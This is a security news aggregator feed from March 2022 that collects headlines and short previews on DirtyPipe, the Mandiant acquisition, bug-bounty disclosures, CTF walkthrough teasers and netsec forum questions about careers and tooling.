    A block cipher is a symmetric-key algorithm. It splits the plaintext into multiple blocks of equal length and encrypts or decrypts each block separately with a deterministic algorithm and a symmetric key. Block encryption is an extremely important component of encryption protocols; typical examples are AES and 3DES, which are standard encryption algorithms approved by the US government.
    Challenging Amazon and Microsoft's lead in the cloud market, Google plans to acquire cybersecurity firm Mandiant for $5.4 billion
    If the acquisition succeeds, Mandiant will join Google's cloud computing division to compete better with Amazon AWS and Microsoft Azure in the cloud market.
    To counter sanctions, Russia decides to build its own TLS root certificate
    The Russian government has now decided to create its own certificate authority, offering a solution for independently issuing and renewing TLS certificates.
    Guanzai Lecture | Analysis of an APT phishing email
    Recently a colleague reported receiving a suspected phishing email. The sender name was that of a company colleague, but the sending address comercial1@qualitypro.com.co is not a company mailbox
    Review of the CIS2021 Spring Edition security compliance session live stream: cybersecurity experts offer advice on practice and development
    Security compliance is a pain point for many enterprises. In the CIS2021 Spring Edition security compliance session, five experts explored the path to enterprise compliance through their own constructive talks.
    CIS 2021 Spring Edition "5G and AI Security" session review: 5G puts security on the fast track
    Explosive growth driven by combining artificial intelligence with industry is one of the major trends in the future development of China's mobile internet. Against this backdrop, network and information security has also been given a broader and deeper definition.
    Hackers target Ukraine's IT Army with a tainted DDoS tool
    Threat actors are using information-stealing malware that imitates Liberator, a tool commonly used by pro-Ukrainian hackers to attack Russian propaganda sites.
    Autohome is hiring cybersecurity interns
    Founded in 2005, Autohome is committed to providing consumers with one-stop services for browsing, buying and using cars, and offers quality automotive consumption and car-life services.
    A brief discussion of how to solve identity management in the cloud era
    A cloud-based OneAuth service can alleviate these problems by providing single sign-on (SSO) across all these applications, giving users a central place to access all their resources with a single username and password.
  • Open

    Analysis of the Linux kernel privilege escalation vulnerability "DirtyPipe" (CVE-2022-0847)
    Author: Venustech ADLab. Original link: https://mp.weixin.qq.com/s/RoGHvNW2Y6dZOjgsBVVm5Q 01 Vulnerability details: Recently, researchers disclosed a Linux kernel local privilege escalation vulnerability. In the copy_page_to_iter_pipe and push_pipe functions, the "flags" member of a newly allocated pipe_buffer structure is not properly initialized and may contain the stale value PIPE_BUF_FL...
    Analysis of the Linux kernel privilege escalation vulnerability DirtyPipe (CVE-2022-0847)
    Author: ghost461@Knownsec 404 Lab. Date: March 11, 2022. Introduction: On February 23, 2022, the Linux kernel released a patch fixing an arbitrary file overwrite vulnerability (CVE-2022-0847) present in kernel 5.8 and later. The vulnerability allows an ordinary user to escalate local privileges to root; because its principle is similar to the earlier DirtyCow (CVE-2016-5195) vulnerability, it was named DirtyPipe. On March 7, the vul...
  • Open

    Gallery Tryhackme Walkthrough part-1
    No content preview
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows and new to the scene! Continue reading on InfoSec Write-ups »

  • Open

    XSS via Mod Log Removed Posts
    Reddit disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1504410 - Bounty: $6000
    Open Redirect on https://.8x8.com/login?nextPage=%2F
    8x8 disclosed a bug submitted by ig420_vrush: https://hackerone.com/reports/1467046
  • Open

    How I was able to read any user's confidential reports on a public level domain
    Hello all, today's write up is about how I chained IDOR with BAC to read any user's confidential reports on a public domain (we will call… Continue reading on Medium »
    Bypassing CSRF token protection by abusing a misconfigured CORS policy
    So, today I am going to teach you about a cool and interesting way of bypassing the token protection used against CSRF attacks by finding… Continue reading on Medium »
    Explore DeNet ecosystem and get a reward
    DeNet users can benefit while just exploring the ecosystem: perform tasks and simply check-in the app. Continue reading on DeNet | DFILE »
    Nexus Mutual Bug Bounty Matching Program Pays $200,000 To Whitehat
    The Nexus Mutual trial bug bounty matching program has just provided its first matching payout as part of its partnership with Immunefi: a… Continue reading on Immunefi »
  • Open

    CrowdSec releases first threat landscape report based completely on crowdsourced data from the community of CrowdSec users
    submitted by /u/klausagnoletti [link] [comments]
  • Open

    Moving from support engineer to cyber security?
    Hello. Soon I start a support engineer job making 60k. Can I get a security analyst job afterwards with the right certifications? Should I look for a NOC job or something similar? Will that make at least 60k? What should I do? submitted by /u/throwaway_69333 [link] [comments]
    increasing range of wifi adapter
    So is there a way to increase the range of my awus1900? The only way for me to connect to a wifi far away is to throw it out the window, like literally XD. I was thinking of a bigger antenna for it, if that would work. It already has very good range, but I find that it can't connect to wifis, even though it sees them, if they are like 50 meters away. I tried putting it up on the roof, but the range was better on the ground with all the buildings blocking it, for some reason. Well, I have no idea how this works, so that's why I'm asking. submitted by /u/Y0SH1zzzz [link] [comments]
    GCP Security Audit
    Hi there, I have never had experience with Google Cloud Platform. Is there a way to do a fast audit of: publicly exposed GCP hosts; GCP permissions for assigning external IPs; GCP firewall rules, for all projects (I have 40 projects) in the organization? submitted by /u/athanielx [link] [comments]
    Streaming websites asking for script permission
    Hey, some websites I've visited asks for permission to run a script called ????.com/remote_control.php, it gets blocked by NoScript. Wondering if this is a common script used in video streaming or if it is as malicious as it sounds? submitted by /u/Pollyypop [link] [comments]
    Does Alienvault upload any of our data?
    Hi Guys, We're looking to deploy AlienVault OSSIM in our environment as a SIEM monitoring tool. I have reviewed this with my team and the major concern we have is whether AlienVault uploads any of our data into the cloud, and what exact data they upload, but I can't seem to find any resources online that explicitly state that. I was wondering if anyone here has any ideas/knowledge on this? Also happy if anyone has any suggestions on other free and open-source SIEM tools that can be used. submitted by /u/thetayoo [link] [comments]
    Career Switch 2.0
    Hey guys.. So... I would like to ask you guys a couple of things, as this is gonna be a very new topic and a new chapter for me in my life. I am 27 y/o and know batshit about software/coding/development etc. I am always smart when it comes to the hardware side of computers and mobile devices. I always find the fixes and get the thing up and running. However, I want to get into EH or a related field. Anyways, I have been in customer service for the past 7 years, and that was because I was not able to pursue my dream in IT as I was broke T_T. But now I got the chance of either shifting to another country and learning and finding a job, or staying here and finding a job. So I would like to ask a few questions from you guys about how tough it is and how badly it's gonna affect me, as it's a whole next-level chapter for me. Note that I am bad at maths (like I never learnt it at an advanced level). What is the study path? What's the best country to shift to for studies? (Thinking of Canada/US/UK) Is it necessary for me to start from scratch, like doing a certificate > diploma > degree > masters or whatever? Sites/platforms where I could study things related to the field? How badly is it going to affect me with the switch since it is all new? What are the pros and cons of getting into this field? Any other advice or suggestions that come to your head. :) Edit: One more point I would like to add after seeing the comment from this guy; What's the study path and career path for hardware hacking? Thank you so much! Love you all <3 submitted by /u/PapadumSriLanka [link] [comments]
    Tenable - Audit Scan - No result
    Hello AskNetsec, I am trying to run a CIS L1 Compliance scan on my Microsoft Windows Server 2012 R2 Datacenter and Microsoft Windows Server 2016 Datacenter, though I keep getting no results. When I run a Debug scan it says the following: "Nessus has not identified that the chosen audit applies to the target device." It might be the case, though I am unsure as to what CIS scan to use instead. I would appreciate your help on this case. Thank you in advance. Device full name, OS and version: "Microsoft Windows Server 2012 R2 Datacenter 6.3.9600" Chosen CIS: "Cis Windows Server 2012 DC L1 v2.2.0" and: "Cis Windows Server 2012 R2 DC L1 v2.5.0" Device full name, OS and version: "Microsoft Windows Server 2016 Datacenter" Chosen CIS: "Cis Windows Server 2016 DC L1 v1.3.0" submitted by /u/Gabbana2 [link] [comments]
    Potential doxx advice
    I was advised by a reply in r/AskComputerScience to post here, so here it is. Hi, I was on a call with someone on Discord who I didn't know on a personal level and they told me some information about myself that is not public anywhere, e.g. my full name, address etc (my Discord also is not linked to anything except my Steam account). I was wondering if anyone has any insight on how they managed this. It has quite shaken me up, as I have never had this happen to me before, as I am as careful as I can be with what information I give out online and always have been. Thanks submitted by /u/Confident_Lobster180 [link] [comments]
  • Open

    Ask HN: How would the Dirty Pipe vulnerability be exploited on Android?
    I have seen articles claiming that the Dirty Pipe vulnerability could cause security issues and even root access on Android devices with the vulnerable kernel version. Can you explain how this would happen, as I presume each application is isolated through virtualization? Comments URL: https://news.ycombinator.com/item?id=30629680 Points: 2 # Comments: 1
  • Open

    If you're interested, the Microsoft Detection and Response Team (DART) will be holding an AMA next Tuesday on Tech Community answering questions on incident response and more
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-03-10 Review
    Analyzing Dubbo RCE with CodeQL by ourren; Dependency-analysis-based software supply chain assessment metrics for predicting changes in npm package popularity by ourren. For more of the latest articles, visit SecWiki
  • Open

    Pentesting toolkit: all you need to know
    “A Penetration Test is a technical assessment designed to achieve a specific goal.” Continue reading on Faraday »
    My Red Team Approach
    Initially, we conduct passive and active information gathering from publicly available sources to analyze which information is valuable… Continue reading on Medium »
    Red Team Tricks And Techniques
    Why Do I use VBA? Continue reading on Medium »
    Reflective DLL Injection
    Reflective DLL injection is a code injection technique that loads into a target process from memory. Reflective DLL injection is… Continue reading on Medium »
  • Open

    Rust fuzzing using cargo-libafl (LibAFL-based fuzzer)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Learning K8S security (part 1)
    I have recently been learning K8S-related cloud-native technology, since I happen to encounter it at work, and have wanted to find an opportunity to study exploitation and defense in this area in depth, hence this article
    From cognitive warfare in cyberspace to large-scale paralyzing cyberattacks against Russia
    The large-scale cyberattack observed this time used tactics and launch methods rarely seen in history; NSFOCUS Tianyuan Lab conducted a detailed tactical and technical analysis of the attack.
    210,000 FB users "across time and space" share the CIS 2021 Spring conference
    CIS 2021 Spring Edition in numbers: we present the answers with data.
    FreeBuf Morning Report | Several Russian government websites hit by supply chain attack; UK announces new rules to tackle surge in scam ads
    Several Russian government websites hit by supply chain attack: the websites of some Russian federal agencies suffered a supply chain attack in which attackers compromised a statistics tool used by government agencies to track visitor numbers.
    CIS2021 DevSecOps Applications and Technology session concludes successfully, cybersecurity experts discuss security
    On the morning of March 10, the CIS2021 DevSecOps Applications and Technology session was live-streamed in full on the FreeBuf website, shared with thousands of viewers who enjoyed the excellent talks together.
    Another major CPU bug disclosed, affecting Intel, AMD and ARM
    Security researchers have found a new method that bypasses existing hardware-based defenses for speculative execution in Intel, AMD and ARM processors.
    App compliance practice: 3000 questions, part 2
    The previous article, "App compliance practice: 3000 questions", received an enthusiastic response. Long awaited, the second installment of the 3000 questions on compliance practice has arrived.
    The huge potential of small-data AI
    We present our findings on all papers in the research cluster in terms of research progress, national competitiveness and funding. Through these analyses we hope to identify the current and expected research progress of these methods, determine which country is leading, and find the main funding sources for this research.
    [Full PDF download] Complete analysis of the Conti leaked data; suspected member identities exposed!
    As the Russia-Ukraine conflict escalates, hacker groups are taking sides. On February 27, a large amount of the Conti ransomware group's internal data was leaked, exposing everything from chat logs to suspected member identities.
    CIS 2021 Spring Edition data security forum concludes successfully; excellent talks not to be missed
    The data security forum explored the latest data protection technologies and best operational frameworks in depth.
    HP fixes 16 UEFI firmware flaws affecting laptops, desktops and PoS systems
    Recently, researchers at cybersecurity firm Binarly discovered 16 high-severity Unified Extensible Firmware Interface vulnerabilities affecting HP enterprise devices.
    Intelligent connected vehicles face security tests
    As the rate of vehicle connectivity keeps rising, such security problems are expected to become more prominent in the future.
  • Open

    Digital Forensics
    Hello all. Had a question. I've been looking for an internship in Digital Forensics. Any suggestions? Been looking everywhere. Just want to get my foot in the door. Or anyone that can mentor me. I'm in the USA. submitted by /u/Sudden_Ad9859 [link] [comments]
    Forensic collections of O365 mailboxes
    As the title suggests, what are people using/doing to collect O365 mailboxes that is not using the Microsoft Compliance eDiscovery portal, aka Nuix Workstation (GraphAPI), MailStore Client, so on and so forth. Any information on pros and cons for the method you use and any possible hiccups you have found during the course of using these apps. submitted by /u/Phorc3 [link] [comments]
  • Open

    PROPHET SPIDER hackers exploit CVE-2021-22941 to deliver a webshell
    Translator: Knownsec 404 Lab translation team. Original link: https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ In early 2022, CrowdStrike Intelligence and CrowdStrike Services investigated an incident in which PROPHET SPIDER exploited a vulnerability affecting Ci...

    [ Hack The Box ] Intel - Writeup
    It seems a huge trove of credit card details is being sold by a group going by the name flinchsec. Can you find any sites or artefacts… Continue reading on Medium »


    Helpful Bug Bounty Resources
    Eight resources to help you on your bug bounty journey Continue reading on Medium »
    Hacking with sqlmap
    Sqlmap : Continue reading on Medium »
    OTP bypass via response manipulation and brute forcing.
    Hello Hackers, Continue reading on Medium »
    Introduction to Simple Buffer Overflow
    This article will provide an overview of exploit development, with a focus on creating Simple Buffer Overflow exploits. I’ll try to keep… Continue reading on Medium »
    The 10 Best Programming Languages for Hacking
    Before diving into this, it would be great to note that your programming of choice will much depend on the type of system you are… Continue reading on Medium »
    How To Become a Good Hacker? The Fundamental Skills
    These are the basics that every hacker should know before even trying to hack. Once you have a good grasp on everything in this section… Continue reading on Medium »

    Do you grind or just learn on your own pace?
    Hi, so I just graduated 2 months ago. I did one interview with a super cool guy in a cyber security company for an infosec job. He helped me a lot and liked the way I think, although I had many shortcomings. He told me to study Network+ and eLearnSecurity web penetration, and to keep practicing on HackTheBox, then interview again. The problem is that I have military service in 4 months, and it's obligatory. Currently I am studying Mike Meyers on Udemy for Network+; I read some reference books sometimes. And when I finish it I will start building my own network lab on GNS3. For the practical side I am practicing on HackTheBox, just ranked from noob to script kiddie. I still read writeups a lot and get stuck after I find a vulnerability or sometimes even at enumeration. My question is, did you ever grind and work hard to achieve bigger outcomes in shorter time? I feel like I should study more, I mean like I should stay up all night 2 days a week to finish all of that. And I feel like I should spend almost all of my day hacking. Sure I can go out for an hour or two, but that is that. I fear I will have a burnout, but I also fear that I will keep learning basic stuff and it will take me forever to land a job. I want to be a pro and I know it's fucking hard, but this is my passion since I used to create RATs during high school. I feel I should give it everything I have. I am an introvert with almost no friends anyways, so why not? Is a grinding mindset useful here? submitted by /u/Ramseesthe4th
    Security risk analysis from Trojan?
    Hi there, Usually I'm very vigilant and can easily spot most net security scams and am educating others on how to avoid them. However at one of my jobs I've been waiting on someone to send me a report for a few weeks now and when an e-mail came up today on my work e-mail that looked to be that report, I finally fell for a viral e-mail. Basically the report was on a spreadsheet that I downloaded on the email through Thunderbird. It said that I needed to enable editing or press the view in browser button. This didn't make any sense to me and there was no "enable editing" thing that it mentioned, so that did ring alarm bells, but because I was waiting on a similar report from my upper manager, I ignored that and pressed the view in browser button. Now I'm not sure if this was prompted by my…
    Vulnerability Management
    Tracking Sec+ as a foundational certification, but what additional certifications are valuable to have when seeking employment in the vulnerability management field? submitted by /u/5Crabby1s
    SNMPv3 Password best practice.
    I have taken over a 15-segment switch network that has been neglected in the use of best practices for many years. I have migrated from telnet to SSH, local logins to RADIUS, and so on. The only push back from my coworkers is the users and passwords for SNMPv3. They want each segment to have its own user and password, i.e. admin1 password1 for site 1, user2 password2 for site 2. We do this for the local passwords in case the site can't reach the RADIUS server. I do not care per se, but I can't find any useful information on this particular topic, and the monitoring systems we use make it difficult to set up SNMPv3 alone, and it goes downhill from there when setting up multiple users and passwords. In addition, we only use SNMP for monitoring. Can anyone direct me to some good information on this topic, or if they can take a moment of their time to explain it here? - Thank you in advance submitted by /u/NetworkRex
    How could Russian military communication system require 3G or better to work?
    Christo Grozev, leader of Bellingcat, claims the Russian military communication system Quartz (or Era) requires UMTS (3G) bandwidth in order to work. Or at the very least, I assume it's the bandwidth requirement which makes GSM (2G) insufficient. https://twitter.com/christogrozev/status/1500978613113524229?s=20&t=coMiAhwmqZQY5Wh60W9h4A I would have guessed Russian military phones used familiar protocols from the good old TLS suite, i.e. RSA/ECDSA for key exchange, AES for symmetric keys, and pre-installed FSB root CAs and individual client certs. Do you have any hypothesis on what design Quartz could have to make GSM bandwidth insufficient? Allegedly, two Russian operatives had to resort to unprotected GSM for a phone call. How is it possible that their encryption suite creates such a heavy data overhead? Do you have other hypotheses, unrelated to bandwidth requirements? submitted by /u/engineerL
    How a Front-End Developer can get into Netsec?
    Hi everyone! I'm a 23 year old Web Dev (working for 3 years). A few months ago I decided that I wanted to change the direction of my career and get into cyber security. My ultimate goal or dream job in security would probably be to become a penetration tester that works with a team of experts on getting into businesses through network vulnerabilities, service misconfiguration or physically by phishing, social engineering and trying to get in the building (of course legally). I reckon it's a very specialised job and definitely not entry level, but I think it's important to mention the end goal to get the whole picture. I researched a lot about becoming a pentester. I spend my time on TryHackMe and have rooted some retired machines on HackTheBox, of course using Kali, yet I feel I lack A LOT of knowledge and credibility, so here lies my problem. I fell into a rabbit hole of googling "which cert is the best", "how to become X", "best way to Y". So rather than digging deeper and deeper I figured I'll just ask my own questions. Of course, what certs should I get? OSCP is an obvious answer, but I don't feel like I'm ready, also I never got a cert in my life AND it's pretty expensive (I'm not even gonna mention SANS). Sec+ and Net+ are great intro certs but they don't really help with HR and I'm not sure if my web experience is enough for me. I feel like I have an okay grasp on network and security concepts. eJPT and eCCP teach you a lot, but are even less recognized by HR than the CompTIA ones. Isn't it better to take a step back and first try to become a SOC or sysadmin? Preferably Linux sysadmin. Should I just concentrate on HTB, start a blog, get PEN-200 and push for OSCP? Isn't it too risky? PS. I'm planning on moving to Germany, so I also spend time learning the language, and I have 7 months before I move out. I set myself a goal to get my Netsec job there. I hope what I said makes sense. submitted by /u/Anvvir
    What's exactly considered DoS/DDoS attack? (Multiple Cases)
    Hey folks, I want to know the exact definition and I'll tell you why it's confusing me. Here are some cases: 1. I sent a file that is actually an endless "while" loop. This means a DoS attack is every way of denying service by making the server use too many resources. 2. I sent a file that actually stops all the services/processes every five seconds. This means a DoS attack is actually every way of denying a service. 3. I'm just sending a lot of ethernet frames in different ways (ping, HTTP, whatever). This means a DoS attack is every way of denying a service only by a massive amount of requests. ** I know it's kind of ridiculous, but if it's actually any way of denying service, would you also consider someone that physically disconnected the server cables as a DoS attack? ** If the definition is number 1, are 2 machines that sent the same file already considered a DDoS? Thanks! BTW, is there an official list of the most common DoS/DDoS attack types in the last years? submitted by /u/Webly99
    Threat Model Stakeholders from a security team?
    Who are the appropriate personnel to include in a threat model from a security standpoint? Security architects? Engineers? SOC analysts? Vulnerability management personnel? Compliance? submitted by /u/bankster24
    RBAC question
    Hello, I am not in cyber; however, I am developing an org structure as part of my school assignment. The roles I came up with that are part of driving the RBAC implementation are: Role Dev Lead, Role Eng. Lead, Role Decomm. Lead, Role Maint. Lead and Auditor Lead. Are they close to RL roles? Thanks! submitted by /u/Hav0c_wreack3r

    Use of Unsafe function || Strcpy
    curl disclosed a bug submitted by shobhit2401200: https://hackerone.com/reports/1485379
    Binary output bypass
    curl disclosed a bug submitted by eliasknudsen: https://hackerone.com/reports/1468962
    Occasional use-after-free in multi_done() libcurl-7.81.0
    curl disclosed a bug submitted by luminixaaron: https://hackerone.com/reports/1463013
    Error Page Content Spoofing or Text Injection
    Krisp disclosed a bug submitted by mrirfan__07: https://hackerone.com/reports/1444031
    Unsubscribe links leaked
    Krisp disclosed a bug submitted by blackxxhat: https://hackerone.com/reports/1439025
    RXSS on https://equifax.gr8people.com on Password Reset page in the username parameter
    Equifax disclosed a bug submitted by miguel_santareno: https://hackerone.com/reports/1463638
    Race condition in endpoint POST fetlife.com/users/invitation, allow attacker to generate unlimited invites
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1460373 - Bounty: $100
    High memory usage for generating preview of broken image
    Nextcloud disclosed a bug submitted by fancycode: https://hackerone.com/reports/1261225 - Bounty: $100

    Demystifying E-Commerce Website Security
    Having an E-Commerce website can have its fair share of risks these days. As a site owner that handles online payments, however, it's even more important to understand those risks and the best methods of keeping them from impacting not only your business but your customers as well. Here we'll be discussing the main aspects that are important to an E-Commerce website, the kinds of vulnerabilities that can impact your business, and how to take better preventative measures. Continue reading Demystifying E-Commerce Website Security at Sucuri Blog.

    What is OSINT? (Part 3)
    The rules of the trade Continue reading on Medium »
    What is VenApp, Venezuela's new social network?
    A few days ago an acquaintance sent me this: @VenAppSocial. When I opened the profile, the first thing I saw was the description: “The new social network… Continue reading on Medium »
    What is third-party risk management?
    Third-party risk management (TPRM) is a type of risk management that focuses on identifying and mitigating risks associated with the usage… Continue reading on CodeX »
    What is BYOD (Bring Your Own Device) Policy
    BYOD, or Bring Your Own Device, is a growing trend in which employees use their personal devices for work. Companies that implement BYOD… Continue reading on CodeX »

    Branch History Injection - Circumventing Spectre-v2 Hardware Mitigations
    submitted by /u/LordAlfredo
    Yarn, Pip, Composer & co: Vulnerabilities in popular package managers
    submitted by /u/SonarPaul
    IDA Pro plugin: query based xref finder for vulnerability research
    submitted by /u/Martypx00
    Forgiva Enterprise: A password manager that never saves your passwords.
    submitted by /u/marcusfrex

    Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
    Introduction CVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellermann, present in the Linux kernel itself in versions after 5.8, which allows overwriting data in... The post Linux Privilege Escalation: DirtyPipe (CVE 2022-0847) appeared first on Hacking Articles.

    Revisiting Phishing Simulations
    Rethinking the way that we approach phishing as a component of red team operations Continue reading on Posts By SpecterOps Team Members »

    SecWiki News 2022-03-09 Review
    A cyber threat intelligence sharing platform from the user's perspective by ourren; CodeBERT: A Pre-Trained Model for Programming and Natural Languages by ourren; A brief look at eBPF-based malicious exploitation and detection mechanisms on Linux by ourren; The future of security is context by ourren. For more of the latest articles, visit SecWiki

    The Unique Challenges of Companies Born in the Cloud
    There are stark differences between how to manage security policies for on-premises network environments and those that are 100% cloud-based. But many companies continue to struggle with those differences and have experienced plenty of pain as a result. It’s a challenge Rich Mogull has spent years trying to help companies navigate. Mogull, CISO at Firemon, […] The post The Unique Challenges of Companies Born in the Cloud appeared first on Security Weekly.

    Triaging A Malicious Docker Container
    submitted by /u/MiguelHzBz

    AutoWarp: Vulnerability in Azure Cloud allows access to all company accounts
    Article URL: https://twitter.com/Yanir_/status/1500863874412724229 Comments URL: https://news.ycombinator.com/item?id=30614889 Points: 5 # Comments: 0
    APC Ups – Critical-Vulnerability
    Article URL: https://www.armis.com/research/tlstorm/ Comments URL: https://news.ycombinator.com/item?id=30612835 Points: 2 # Comments: 0

    Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene
    Every day, new challenges, attacks, and vulnerabilities are publicized. Just as attackers and the threat landscape are constantly changing, adapting, and evolving, so too must the Blue Teams and defenders who protect organizations against these threats. While the old adage may have been that attacks are rare and unlikely to happen, a new mentality of... The post Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene appeared first on TrustedSec.

    Number of cyberattacks on industrial control systems rises slightly
    In 2021 the share of ICS devices worldwide that were hit by cyberattacks rose slightly, to 39.6%; in the second half of 2021 alone the share was just 31.4%.
    Expert view: securing the digital transformation of banking and insurance
    Bangcle Security helps the banking and insurance industries with digital transformation
    CIS 2021 Spring Edition opens its first day of live-streaming, with 100,000 viewers online cheering for security
    The excitement doesn't end today: the CIS live room will be back tomorrow at 9:30 a.m. sharp~
    FreeBuf Morning Report | NPC deputy proposes jointly building a data compliance governance platform; Google acquires cybersecurity firm Mandiant for $5.4 billion
    Google's parent company Alphabet announced on Tuesday that it plans to acquire cybersecurity firm Mandiant for about $5.4 billion. If the deal closes, it will be Google's second-largest acquisition ever.
    A summary of network security appliance fundamentals
    Security appliances 1. Firewalls
    APC UPS zero-day vulnerabilities can remotely burn out devices and cut power
    A recently tracked set of three critical zero-day vulnerabilities, TLStorm, could let hackers take control of uninterruptible power supply (UPS) devices from Schneider Electric subsidiary APC
    Cloud-native environment information gathering techniques explained (Part 2)
    Information gathering is a critical step for both attack and defense; high-quality information gathering results are the first precondition for subsequent work to proceed smoothly.

    [Security Bulletin] Microsoft's March 2022 Patch Tuesday fixes multiple high-severity vulnerabilities
    Recently, Microsoft released its March 2022 security patches, fixing 71 CVE vulnerabilities across 29 Microsoft products (not including 21 Micros...

    Building a Red Team - Which C2 to pick?
    Hello redteamsec community, my company wants to enhance the actual security testing services from basic assessments and penetration tests to red team engagements. At the moment we are planning the Red Team infrastructure and I am currently looking for the best pick of a C2 framework. I checked out the following: - Covenant - PoshC2 - Metasploit (if you can call it C2, you know what I mean) Further on my list are: - Cobalt Strike - SilentTrinity - Apfell - FactionC2 - Merlin What gives me a hard time is how to decide on the framework we want to run. That's why I ask you what you guys recommend and WHY. Regards! submitted by /u/larryxt
    A Summary of APT41 Targeting U.S. State Governments
    submitted by /u/dmchell

    Large-ish mp3 library (Full albums, but selection can be hit or miss)
    Edit: After some further searching I had to make an edit, I'm sorry, the Full albums are unreliable for consistency, they are there but it's not guaranteed for every artist so please don't get your hopes up too high if looking for a specific album! The songs that are there are good quality though, that much I can guarantee from my searches! http://www.ashleecadell.com/xyzstorelibrary/ submitted by /u/migali

    Phonebook, the way to DoS a company
    No content preview
    Healing blind injections
    No content preview
    How I created a Trojan Malware — Ethical Hacking
    No content preview

    The invoice is fake, the Agent Tesla attack is real
    Translator: Knownsec 404 Lab translation team. Original link: https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla Since the emergence of phishing, fraudulent invoices have been one of the most common lures. The usual approach plays on the recipient's desire to avoid debt, especially where business interests may be involved. FortiGuard ...


    Does connecting to a network via Ethernet have any extra security risks vs connecting via WiFi?
    As in, if someone has access to your network via Ethernet, does it have any extra security risks to your system compared to if they were connected via WiFi? I'm thinking it depends on the type of internet your connection uses, e.g. fiber, cable, DSL, etc. submitted by /u/computerstuffs
    How do you stay motivated to learn and prevent burnout?
    I'm already in a somewhat senior engineering role so I'm not forced to learn for school or to get a better job. I always want to keep driving myself to learn new things and stay on the cutting edge of infosec in order to both be more knowledgeable in my current role but also for my own curiosity. Balancing this with a full time+ career as well as family and social obligations feels exhausting sometimes. What do you guys do to stay motivated? submitted by /u/Deliveranc3
    What are your favorite data visualizations and analytics?
    Be it for threat hunting or making sure everything's hunky dory, for reporting activity or predicting trends, what do you like to see graphed, and what insights does it give you? I'm looking for more tools for the toolbelt. submitted by /u/Outside-Log-2104
    How to open 120 GB SQL file than without my pc ?
    My SSD has low capacity; how do I open it? submitted by /u/mefumetsub
    What was running in the shell when I logged in to a compromised server?
    I have some old sites I run for friends and family on a shared small webhosting place that has a cPanel Linux server. I don't use cPanel for much and don't know all that much about it. I forgot about a WordPress site I was running and someone got it and was able to then compromise the cPanel login. Shame on me for letting a WordPress site sit vulnerable, I know. But it happens. They were then able to get into cPanel. So they loaded up a few WordPress sites with phishing site stuff, and also sent out some phishing emails, all pretty standard stuff I've seen before. Lots of base64 php files and other standard WP hack php stuff. Something I hadn't seen before happened when I SSHed into the server, and I'm not sure what it was or what they had running. I logged in and immediately saw an error that I don't exactly remember, but it was a normal looking error about "no shell", I couldn't do anything, it was just an empty shell. None of the standard commands worked. So I logged in, and something caught my session and had me in... I don't know what. I did ctrl-d or maybe ctrl-c and was back to the normal shell on that server. Things looked normal again. I wasn't even sure I was on the server at first, so I didn't capture the exact errors I was seeing before the return to normal. One thing that I did notice was the title of my session in iterm2 had changed to what looked like a list of files on the server with ^M in between the names. So, something like access-logs^M^application-backups^M^dbs^M^ and so on, all the root level directories. By the time I gave it any thought, I had already cleaned up most everything and killed a couple of running processes. Any idea what I got into when I logged in to there? submitted by /u/blakesterz
    Can url/ip of microservice being requested by a server be found out?
    I currently have a Ruby on Rails server that does server-side rendering, and it calls one of my microservices. I have Basic Auth implemented for that microservice, but I wonder if it is possible for someone to find out where that microservice is and the header/body of my request? Can that be safely prevented by HTTPS? submitted by /u/hksparrowboy
    How to best visualise risk from vulnerability findings based off CVSS scores?
    We got a report for the vulnerabilities across a system. The findings showed around 40 high vulnerabilities, 150 medium vulnerabilities and 300 low vulnerabilities. The problem I have is how to visually get this across to management as I can make it a simple pie chart but because of the 300 low vulnerabilities dwarfing the 40 high vulnerabilities it doesn't come across particularly well. Does anyone have any ideas? Also we've created a calculation to plot the average score by using the cumulative total of all CVSS scores divided by the number of findings and because there's so many low findings with low scores this is causing it to look better than it is as having around 40 high vulnerabilities isn't good. Does anyone have any sort of formulas or calculations I can use to get this risk score across better? Thanks submitted by /u/nimdroid
    Tool to manage vulnerabilities from different sources?
    OK, so the basics are that we're looking for a tool that we can use to group together and manage vulnerabilities found from multiple other sources/scanners (preferably open source). We're not looking for anything that will run its own scans; rather, one that manages already found reports... if that makes sense. At the moment we're currently using an Excel spreadsheet to group everything together. If anyone has any suggestions that would be a life saver, thank you in advance. submitted by /u/Autumn-shadow
    Sandvine technology for newbie
    Hello, my friend worked in the Blue Team domain as network security, mostly on firewalls, WAF, IPS, etc. solutions. He lost his job earlier and saw an opening at Sandvine, which he applied for and got a call for an interview, but he is not sure what type of questions to expect. Appreciate it if anyone can advise what he should study and what type of questions to expect and how to respond. TIA submitted by /u/junostik
    Conducting CMMC - NIST 800-171: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations at the company I work for
    Hey all, I just started a job and I have to run some tests on use cases/artifacts/evidence scenarios. The company wants me to enter their IT security labs and check items that are out of date, such as routers, where firewalls are located, etc. There are 110 controls and I need to align a majority of the company's internal systems and processes with NIST 800-171 for CMMC. What is the best way to do this? submitted by /u/LordCommanderTaurusG

    GraphQL cross-tenant IDOR giving write access through the operation UpdateAtlasApplicationPerson
    Stripe disclosed a bug submitted by bubbounty: https://hackerone.com/reports/1066203 - Bounty: $2500
    objectId in share location can be set to open arbitrary URL or Deeplinks
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1337178 - Bounty: $100
    PHP Info Exposing Secrets at https://radio.mtn.bj/info
    MTN Group disclosed a bug submitted by pudsec: https://hackerone.com/reports/1049402

    Phonebook, the way to DoS a company
    I had to add my personal info to a phonebook, which I don’t like, so I took down the server ;) Continue reading on InfoSec Write-ups »
    My Pentest Log -9- (Open Redirect Vulnerability)
    Greetings from Kerkoporta to all, Continue reading on Medium »
    Gallery Tryhackme Walkthrough part-1
    File uploading attack Continue reading on Medium »
    Log4shell in google $1337.00
    Looking through the google cloud console for products “https://console.cloud.google.com” to look for bugs i came across VMware Engine. Continue reading on Medium »
    Full Account Takeover due to improper validation of old password
